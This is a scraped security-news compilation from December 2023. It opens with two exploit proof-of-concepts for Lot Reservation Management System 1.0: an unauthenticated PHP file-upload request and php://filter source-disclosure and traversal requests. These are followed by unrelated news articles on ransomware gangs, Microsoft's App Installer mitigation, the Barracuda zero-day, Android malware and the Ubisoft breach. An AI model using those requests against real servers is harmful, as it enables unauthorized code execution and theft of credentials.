Lot Reservation Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.Proof of Concept:-(HTTP POST Request)POST /lot/admin/ajax.php?action=save_division HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027Content-Length: 606Origin: http://192.168.150.228Connection: closeReferer: http://192.168.150.228/lot/admin/index.php?page=divisions-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="id"-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="name"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="description"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="img"; filename="phpinfo.php"Content-Type: application/x-php<?php phpinfo() ?>-----------------------------217984066236596965684247013027--Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.

Lot Reservation Management System 1.0 Shell Upload

Lot Reservation Management System version 1.0 suffers from a file disclosure vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario.Proof of Concept:-(HTTP POST Request)GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9snUpgrade-Insecure-Requests: 1The same can be achieved by removing the PHPSESSID cookie as below:-GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1The file requested will be returned in base64 format in returned HTTP response.The attack can also be used to traverse directories to return files outside the web root.GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1This will return test.php file in the D:\ directory.

Lot Reservation Management System 1.0 File Disclosure

From Sam Altman and Elon Musk to ransomware gangs and state-backed hackers, these are the individuals and groups that spent this year disrupting the world we know it.

In 2023, the world has felt like it was balanced on a precipice. A United States presidential election looms, with a resurgent candidate that threatens to bring with him all the chaos of 2016 and 2020. Artificial intelligence developed so quickly that it seemed to have suddenly sprung into being, heralding vast societal promise and disruption just around the bend of its exponential curve. And the world's richest man continued to use his power to push for a more reckless tech world, from free-for-all social media and oversold assisted-driving features to AI with a “rebellious streak.”

In the midst of that uncertainty, a new war between Israel and Hamas added more atrocities alongside the slow-burning horrors of Russia's invasion of Ukraine. These wars have echoed across the internet in propaganda, hate speech, and cyberattacks that triggered widespread real-world effects. Chinese state-sponsored hackers, meanwhile, sowed the seeds for a future cyberwar, and ransomware gangs resurged. It was a banner year for chaos, present and impending, and all reflected in the digital mirror.

Each year, WIRED assembles a list of the most dangerous people, groups, and organizations on the internet—both those who intentionally endanger innocent people and those whose actions, regardless of their intent, destabilize the world as we know it in myriad ways. Here, in no particular order, are our picks for 2023.

Elon Musk

A year ago, it might have still been fair to regard Elon Musk as a brilliant technologist with occasional destructive, trollish tendencies. In 2023, those tendencies seemed to take over his public identity. Twitter, now renamed X thanks to Musk's branding whims, this year invited back conspiracy theorists like Alex Jones and even amplified one account's antisemitic statements. When advertisers complained, Musk managed in a single conversation to both apologize for that blunder and tell them, “Go fuck yourself.”

Before that, in July, Musk had said that his social media platform's ad revenue had fallen by half—all of which calls into question whether this once-central platform for online conversation will survive Musk's reign, and in what form.

In the midst of that meltdown, Musk's new startup xAI released Grok, an AI chatbot Musk celebrated for having fewer guardrails than OpenAI's ChatGPT. Musk faces calls for an SEC investigation for his comments about how monkeys died in experiments carried out by his brain implant startup Neuralink. And in mid-December, Tesla recalled nearly every model of its vehicles sold in the US to fix an Autopilot feature. The National Highway Traffic Safety Administration found that Tesla's safety measures for assuring that drivers paying attention—which many no doubt were not, perhaps thanks in part to Musk's own descriptions of the assisted-driving feature—were inadequate.

Five years ago, WIRED put Musk's face on the cover with a story that described his Dr. Jekyll and Mr. Hyde personality. These days, it's becoming clearer which side of that split personality dominates.

Cl0p

In 2023, ransomware resurged. According to cryptocurrency firm Chainalysis, it appears to be on track to be the second-worst year on record in terms of total extortion payments collected by the ransomware industry's coercive gangs of hackers. But perhaps no group did more damage this year than the people behind the Cl0p malware.

In May, the Cl0p gang began exploiting a zero-day vulnerability in the MOVEit file transfer software and used it to carry out a shocking spree of intrusions across more than 2,000 organizations, according to ransomware-focused security firm Emsisoft. A single victim, medical firm Maximus, lost control of the data of at least 8 million people in the breach. The hackers stole data from the state government of Maine on another 1.3 million. In total, at least 62 million people were affected, and Cl0p's hackers remain at large.

Alphv

If Cl0p were the most ruthless ransomware hackers of the year, Alphv, also known as Black Cat, were certainly in close contention. The group, which has ties to the hackers who carried out the 2021 cyberattack on the Colonial Pipeline, gained a new level of notoriety in September when it targeted MGM Resorts International, shutting down computer systems across the hotel and casino chain and ultimately doing $100 million in damage, by MGM's estimate. More broadly, the FBI says that Alphv has compromised over a thousand organizations and extracted more than $300 million in ransoms.

In mid-December, the FBI announced that it had seized the dark-web site where Alphv publishes its victims’ stolen data. Hours later, the site reappeared, and Alphv defiantly announced it had “unseized” it and would no longer abide by a rule not to target critical infrastructure systems. The site was soon taken down again. But given that no members of the group have been arrested or even indicted in absentia, its chaos will likely continue.

Hamas

No event of 2023 has shaken geopolitics as suddenly and shockingly as Hamas' atrocities against civilians in Southern Israel on October 7. The attacks, in which Hamas militants killed 1,200 people and took hundreds of hostages, immediately triggered a war that threatens to destabilize the region. It has also shaken the tech world, where it has raised questions about the digital technologies that have enabled Hamas, from the millions of dollars the group raised via cryptocurrency to its channels on Telegram, where it distributes propaganda and videos of its violence. When ISIS came to prominence in 2014, it forced every technology platform in the world to question whether and how it enabled extremist violence. Now, a decade later, a new round of horrific bloodletting shows how that reckoning continues.

Sandworm

Despite sanctions, indictments, and even a $10 million bounty, Russia's team of hyper-aggressive military intelligence hackers known as Sandworm are still out there—and still active. As Russia's invasion of Ukraine grinds toward its third brutal year, in fact, they appear to have turned their focus to that conflict.

This year, Sandworm was revealed to have carried out a third blackout cyberattack against a Ukrainian electric utility, this time in the midst of a Russian air strike hitting the same city. It later penetrated Ukrainian military communications in a more traditional espionage-focused effort to gain an advantage during Ukraine's counteroffensive. And evidence points to Sandworm's responsibility for a cyberattack just this month that hit the telecom Kyivstar, taking out internet and mobile communications for millions amid another series of strikes. The group, in other words, continues to earn its reputation as the Kremlin's most dangerous hackers.

Volt Typhoon

For years, the cybersecurity community has asked itself who might be the “Sandworm of China.” This year provided perhaps the closest thing yet to an answer. The hacker group dubbed Volt Typhoon by Microsoft was revealed in May to have planted malware in power grid networks across the continental US and Guam, in some cases with an apparent eye toward controlling the flow of electricity to US military bases. More recently, _The Washington Post_ revealed that Volt Typhoon's targets have extended to other kinds of critical infrastructure too, from an oil and gas pipeline to a major West Coast port and a Hawaiian water utility.

While the intentions of the group and its overseers are still far from clear, cybersecurity and geopolitical analysts increasingly see it as laying the groundwork to disrupt key US systems in the event of a crisis—such as China invading Taiwan.

Donald Trump

Last year, for the first time since 2015, Donald Trump was not included on this list. Hope you enjoyed the break!

Less than 11 months out from the 2024 US presidential election, Trump leads Republican primary polls by a wide margin. He has used his rekindled relevance to launch disturbing attacks on his perceived enemies, largely from his own right-wing-dominated Truth Social platform.

The Most Dangerous People on the Internet in 2023

Summary In recent months, Microsoft Threat Intelligence has observed threat actors leveraging social engineering and phishing techniques to target Windows OS users and utilizing the ms-appinstaller URI scheme. We have addressed and mitigated this malicious activity by turning off ms-appinstaller by default. Additionally, Microsoft has coordinated with Certificate Authorities to revoke the abused code signing certificates utilized by malware samples we have identified.

**Summary**

In recent months, Microsoft Threat Intelligence has observed threat actors leveraging social engineering and phishing techniques to target Windows OS users and utilizing the ms-appinstaller URI scheme. We have addressed and mitigated this malicious activity by turning off ms-appinstaller by default. Additionally, Microsoft has coordinated with Certificate Authorities to revoke the abused code signing certificates utilized by malware samples we have identified.

Upon detection of this attack vector, Microsoft launched an investigation to ensure proper detections existed within Microsoft Defender for Endpoint and Microsoft Defender for Office to protect our customers.

**Background**

Microsoft initially introduced the ms-appinstaller URI scheme handler in App Installer v1.0.12271.0 to improve the installation experience for MSIX and MSIXBundles.

Recently, malicious activity was observed where bad actors are now using the ms-appinstaller URI scheme handler to trick users into installing malicious software. We highly recommend customers do not install apps from unknown websites.

**Mitigations**

On December 28th, 2023, Microsoft updated CVE-2021-43890 to disable ms-appinstaller URI scheme (protocol) by default, as a security response to protect customers from attackers’ evolving techniques against previous safeguards. This means that users will no longer be able to install an app directly from a web page using the MSIX package installer. Instead, users will be required to download the MSIX package first in order to install it, which ensures that locally installed antivirus protections will run.

We will continue to monitor future malicious activity and make ongoing improvements to prevent fraud, phishing, and a range of other persistent threats. Microsoft will remain vigilant as attackers continue evolving their techniques. Please refer to the Microsoft Threat Intelligence Blog: Financially motivated threat actors misusing App Installer for additional details and guidance.

**To address this issue**

1.  Microsoft has disabled the ms-appinstaller URI scheme handler by default in App Installer version 1.21.3421.0 or higher and if you have not specifically enabled the **EnableMSAppInstallerProtocol**, no further action is needed.
    
    *   Customers can check which version of App Installer is installed on their system by running the following PowerShell command: (Get-AppxPackage Microsoft.DesktopAppInstaller).Version
    *   For information on how to update your App Installer, see Install and update the App Installer.

**How to determine whether you may be at risk**

1.  The **EnableMSAppInstallerProtocol** group policy is set to “Not Configured” (blank) or “Enabled”
    
2.  The version of App Installer installed on your PC is between **v1.18.2691** and **v1.21.3421**
    
3.  Windows OS updates listed below between October 2022 and March 2023 contained a previous (vulnerable) version of the AppInstaller.
    
    *   March 21, 2023—KB5023773 (OS Builds 19042.2788, 19044.2788, and 19045.2788) Preview - Microsoft Support
        
    *   July 11, 2023—KB5028171 (OS Build 20348.1850) - Microsoft Support
        
    *   March 28, 2023—KB5023774 (OS Build 22000.1761) Preview - Microsoft Support
        
    *   October 25, 2022—KB5018496 (OS Build 22621.755) Preview - Microsoft Support
        
    *   Also, customers using builds **v1.22.3452-preview or lower** also contained vulnerable versions of AppInstaller.
        

Note: (not recommended) Customers that must use the ms-appinstaller protocol can still use the App Installer by setting the Group Policy **EnableMSAppInstallerProtocol** to **Disabled**. See Policy CSP – DesktopAppInstaller for additional information.

**References**

*   Installing Windows 10 apps from a web page - MSIX | Microsoft Learn
*   CVE Link
*   Financially motivated threat actors misusing App Installer

Microsoft addresses App Installer abuse

Barracuda has revealed that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoor on a "limited number" of devices.
Tracked as CVE-2023-7102, the issue relates to a case of arbitrary code execution that resides within a third-party and open-source library Spreadsheet::ParseExcel that's used by the Amavis scanner within the

Zero-Day / Email Security

Barracuda has revealed that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoor on a "limited number" of devices.

Tracked as CVE-2023-7102, the issue relates to a case of arbitrary code execution that resides within a third-party and open-source library Spreadsheet::ParseExcel that's used by the Amavis scanner within the gateway.

The company attributed the activity to a threat actor tracked by Google-owned Mandiant as **UNC4841**, which was previously linked to the active exploitation of another zero-day in Barracuda devices (CVE-2023-2868, CVSS score: 9.8) earlier this year.

Successful exploitation of the new flaw is accomplished by means of a specially crafted Microsoft Excel email attachment. This is followed by the deployment of new variants of known implants called SEASPY and SALTWATER that are equipped to offer persistence and command execution capabilities.

Barracuda said it released a security update that has been "automatically applied" on December 21, 2023, and that no further customer action is required.

It further pointed out that it "deployed a patch to remediate compromised ESG appliances which exhibited indicators of compromise related to the newly identified malware variants" a day later. It did not disclose the scale of the compromise.

That said, the original flaw in the Spreadsheet::ParseExcel Perl module (version 0.65) remains unpatched and has been assigned the CVE identifier CVE-2023-7101, necessitating that downstream users take appropriate remedial action.

According to Mandiant, which has been investigating the campaign, a number of private and public sector organizations located in at least 16 countries are estimated to have been impacted since October 2022.

The latest development once again speaks to UNC4841's adaptability, leveraging new tactics and techniques to retain access to high priority targets as existing loopholes get closed.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Exploited New Zero-Day in Barracuda's ESG Appliances

We look at the three most common methods that ransomware groups use to avoid being detected.

An often heard remark is that when your security solution notices a ransomware attack, it’s already too late. There’s a lot of truth in that, if you consider the encryption process to be the ransomware attack. However, these days encryption is just a part of many ransomware attacks.

Some of the cybercriminals we conveniently call ransomware groups have even completely stopped using the encryption process because it’s too “noisy.” Any AI based solution that is worth the electrons used to create it, will notice the activities on a system associated with encryption and the deletion of backups.

In the first days of ransomware, the cybercriminals sent you an email, hoping you would open an attachment or click a link to infect your system with malware. But malware has only a short time-span during which it can hope to stay undetected. Widespread malware is usually just one update away from detection.

So, to hide their presence, many of these gangs have resorted to a lot more silent operations. Consider this typical attack flow:

1.  Initial access is gained by exploiting vulnerabilities on software or hardware found in the target’s environment.
2.  With valid credentials gained by the vulnerability exploitation, phishing, or password attacks, the criminals get access to an internet exposed service, where they can set up some foothold to provide them with command and control options.
3.  From here they can start lateral movement across the target’s network and find ways to raise their permissions.
4.  The next step is often called data exfiltration, which is nothing more than copying interesting looking files to a location under their control where the criminals can have a good look at them.

As you can see, there was no malware involved in these steps. Every single step can be done by using software that is already present. The lateral movement is often done by deploying built-in tools like PowerShell, PsExec, or Windows Management Instrumentation (WMI).

We call this technique Living-off-the-Land (LOTL). LOTL attacks are performed by mimicking normal behavior, and make it extremely difficult for IT teams and security solutions to detect any signs of malicious activity.

Another way to avoid being detected is using fileless malware. Fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. So, the malicious payload exists only in the computer’s memory, which means nothing is ever written directly to the hard drive. As a rule, if malware authors can’t avoid detection by security vendors, they at least want to delay it for as long as possible. This made fileless malware a step forward in the arms race between malware and security products.

Another, very different method to avoid detection is to disable the resident security software before the actual attack is launched. One way to achieve this, which we have seen this year, is by using signed drivers. The drivers can be deployed only when the attacker has already gained administrative privileges on compromised systems. Drivers are loaded early in the boot process of a system and can therefore interfere with subsequently loaded programs.

The most common type of attacks that uses drivers is the “bring your own vulnerable driver” (BYOVD) approach, in which the attackers use a driver from a legitimate software publisher that has known and exploitable security vulnerabilities. Since the driver is legitimate, it will bypass security checks and allow the attacker to then exploit it once it has been installed on the system.

However, there’s also been abuse of several developer program accounts engaged in submitting malicious drivers to obtain a Microsoft signature. Signatures from a trustworthy software publisher make it more likely the driver will get into Windows without interference from the security software.

Many anti-malware solutions, including Malwarebytes, have anti-tampering protection in place, so finding methods to disable the protection is a big deal for malware authors.

Finding signs of malicious activity that are designed to stay under the radar is a job for specialists, which is why many organizations are looking for Managed Detection & Response (MDR) services.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 How ransomware operators try to stay under the radar 

A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices.
Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it's developed using an open-source mobile app framework called Xamarin and abuses the operating system's accessibility permissions to fulfill its objectives.

A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices.

Dubbed **Xamalicious** by the McAfee Mobile Research Team, the malware is so named for the fact that it's developed using an open-source mobile app framework called Xamarin and abuses the operating system's accessibility permissions to fulfill its objectives.

It's also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after determining if it fits the bill.

The second stage is "dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent," security researcher Fernando Ruiz said.

The cybersecurity firm said it identified 25 apps that come with this active threat, some of which were distributed on the official Google Play Store since mid-2020. The apps are estimated to have been installed at least 327,000 times.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

A majority of the infections have been reported in Brazil, Argentina, the U.K., Australia, the U.S., Mexico, and other parts of Europe and the Americas. Some of the apps are listed below -

*   Essential Horoscope for Android (com.anomenforyou.essentialhoroscope)
*   3D Skin Editor for PE Minecraft (com.littleray.skineditorforpeminecraft)
*   Logo Maker Pro (com.vyblystudio.dotslinkpuzzles)
*   Auto Click Repeater (com.autoclickrepeater.free)
*   Count Easy Calorie Calculator (com.lakhinstudio.counteasycaloriecalculator)
*   Sound Volume Extender (com.muranogames.easyworkoutsathome)
*   LetterLink (com.regaliusgames.llinkgame)
*   NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS (com.Ushak.NPHOROSCOPENUMBER)
*   Step Keeper: Easy Pedometer (com.browgames.stepkeepereasymeter)
*   Track Your Sleep (com.shvetsStudio.trackYourSleep)
*   Sound Volume Booster (com.devapps.soundvolumebooster)
*   Astrological Navigator: Daily Horoscope & Tarot (com.Osinko.HoroscopeTaro)
*   Universal Calculator (com.Potap64.universalcalculator)

Xamalicious, which typically masquerades as health, games, horoscope, and productivity apps, is the latest in a long list of malware families that abuse Android's accessibility services, requesting users' access to it upon installation to carry out its tasks.

"To evade analysis and detection, malware authors encrypted all communication and data transmitted between the C2 and the infected device, not only protected by HTTPS, it's encrypted as a JSON Web Encryption (JWE) token using RSA-OAEP with a 128CBC-HS256 algorithm," Ruiz noted.

Even more troublingly, the first-stage dropper contains functions to self-update the main Android package (APK) file, meaning it can be weaponized to act as spyware or banking trojan without any user interaction.

McAfee said it identified a link between Xamalicious and an ad-fraud app named Cash Magnet, which facilitates app download and automated clicker activity to illicitly earn revenue by clicking on ads.

"Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets," Ruiz said.

**Android Phishing Campaign Targets India With Banker Malware**

The disclosure comes as the cybersecurity company detailed a phishing campaign that employs social messaging apps like WhatsApp to distribute rogue APK files that impersonate legitimate banks such as the State Bank of India (SBI) and prompt the user to install them to complete a mandatory Know Your Customer (KYC) procedure.

Once installed, the app asks the user to grant it SMS-related permissions and redirects to a fake page that only captures the victim's credentials but also their account, credit/debit card, and national identity information.

The harvested data, alongside the intercepted SMS messages, are forwarded to an actor-controlled server, thereby allowing the adversary to complete unauthorized transactions.

It's worth noting that Microsoft last month warned of a similar campaign that utilizes WhatsApp and Telegram as distribution vectors to target Indian online banking users.

"India underscores the acute threat posed by this banking malware within the country's digital landscape, with a few hits found elsewhere in the world, possibly from Indian SBI users living in other countries," researchers Neil Tyagi and Ruiz said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices

By Deeba Ahmed
The cyberattack on Ubisoft came just days after hackers from the Rhysida ransomware gang targeted Insomniac Games, the developers of Spider-Man 2.
This is a post from HackRead.com Read the original post: Ubisoft Hackers Scrambled for 900GB of Data Before Foiled

Ubisoft Entertainment SA, a French video game publisher, has confirmed an attempt to breach the company’s security to steal personal and sensitive data from its infrastructure.

According to sources, an unknown threat actor accessed Ubisoft’s internal tools on December 20th, allegedly aiming to obtain 900GB of data. After entering the French game publisher’s internal systems, the hacker reviewed users’ access rights and Microsoft Teams, Confluence, and SharePoint. However, Ubisoft managed to revoke access after 48 hours.

Ubisoft, famous games like Assassin’s Creed and Avatar: Frontiers of Pandora, is investigating the breach to determine how the “unknown threat actor” allegedly gained access to the company’s Microsoft Teams, Confluence, Atlas, and SharePoint channels and maintained access for 48 hours before Ubisoft revoked access.

It’s worth noting that the latest cybersecurity incident at Ubisoft occurred **just a year after** the company was compelled to issue a password reset due to a cyber attack linked to Lapsus$.

The online malware repository VX-Underground posted about the incident on its X (Twitter) page, explaining that the attackers “aimed” to obtain 900 GB of Ubisoft’s data.

“December 20th an unknown Threat Actor compromised Ubisoft. The individual had access for roughly 48 hours until the administration realized something was off and access was revoked. They aimed to exfiltrate roughly 900 GB of data but lost access.”

The researchers also shared screenshots of Ubisoft’s internal services. Whether the hacker(s) could obtain any data before Ubisoft revoked access or not is still unclear. However, it is suspected that the attackers wanted to obtain Rainbow Six: Siege user data but failed. The company claims to be “aware” of the security incident but hasn’t shared any additional information as yet.

This is the second data breach targeting a major video game company this month. Earlier in December, as **reported by Hackread.com**, Ratchet & Clank and Spider-Man developer Insomniac Games got sensitive employee data/information regarding unreleased video games stolen in a massive hacking incident.

The hacker published detailed plans of Insomniac for the next decade, including unannounced projects, production details, art assets, and employee information. Ransomware group Rhysida took responsibility for the hack and demanded 50 bitcoins to prevent the data from being published publicly.

In Ubisoft’s case, so far, there’s no indication that anything of the sort was accessed or leaked. Nevertheless, the resurgence of the trend to target gaming giants is not surprising, as hackers are known to ruin Christmas and holidays for gamers.

****_RELATED ARTICLES_****

1.  **Online gaming and protection against cyber attacks**
2.  **Fake Cyberpunk 2077 Android App Delivering Ransomware**
3.  **Gaming controllers manufacturer exposed 1.1M customer records**
4.  **ALPHV Ransomware Used Vishing to Scam MGM Resorts Employee**
5.  **Capcom ransomware attack: Gaming details leaked; no ransom paid**

Ubisoft Hackers Scrambled for 900GB of Data Before Foiled

The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics.
"The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023.
"Carbanak returned last month through new

The banking malware known as **Carbanak** has been observed being used in ransomware attacks with updated tactics.

"The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023.

"Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software."

Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero.

Carbanak, detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the FIN7 cybercrime syndicate.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to trigger the deployment of Carbanak.

The development comes as 442 ransomware attacks were reported last month, up from 341 incidents in October 2023. A total of 4,276 cases have been reported so far this year, which is "less than 1000 incidents fewer than the total for 2021 and 2022 combined (5,198)."

The company's data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks.

As for the most commonly spotted ransomware families, LockBit, BlackCat, and Play contributed to 47% (or 206 attacks) of 442 attacks. With BlackCat dismantled by authorities this month, it remains to be seen what impact the move will have on the threat landscape for the near future.

"With one month of the year still to go, the total number of attacks has surpassed 4,000 which marks a huge increase from 2021 and 2022, so it will be interesting to see if ransomware levels continue to climb next year," Matt Hull, global head of threat intelligence at NCC Group, said.

The spike in ransomware attacks in November has also been corroborated by cyber insurance firm Corvus, which said it identified 484 new ransomware victims posted to leak sites.

"The ransomware ecosystem at large has successfully pivoted away from QBot," the company said. "Making software exploits and alternative malware families part of their repertoire is paying off for ransomware groups."

While the shift is the result of a law enforcement takedown of QBot's (aka QakBot) infrastructure, Microsoft, last week, disclosed details of a low-volume phishing campaign distributing the malware, underscoring the challenges in fully dismantling these groups.

The development comes as Kaspersky revealed Akira ransomware's security measures prevent its communication site from being analyzed by raising exceptions while attempting to access the site using a debugger in the web browser.

The Russian cybersecurity company further highlighted ransomware operators' exploitation of different security flaws in the Windows Common Log File System (CLFS) driver – CVE-2022-24521, CVE-2022-37969, CVE-2023-23376, CVE-2023-28252 (CVSS scores: 7.8) – for privilege escalation.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Carbanak Banking Malware Resurfaces with New Ransomware Tactics

A list of topics we covered in the week of December 18 to December 24 of 2023

December 21, 2023 - Xfinity has notified customers that due to exploitation of the Citrix Bleed vulnerability, attackers were able to access personal data of almost 36 million customers.

December 21, 2023 - A researcher found two Microsoft vulnerabilities which could be combined to achieve zero-click remote code execution.

December 21, 2023 - Google has issued an emergency update for Chrome that fixes an actively exploited zero-day vulnerability in the WebRTC component.

December 21, 2023 - Pharmacy chain Rite Aid has been denied the right to run facial recognition systems in its stores for five years, by the FTC.

December 21, 2023 - Learn how RaaS gangs use LOTL tactics in their attacks on organizations.

Tag

#microsoft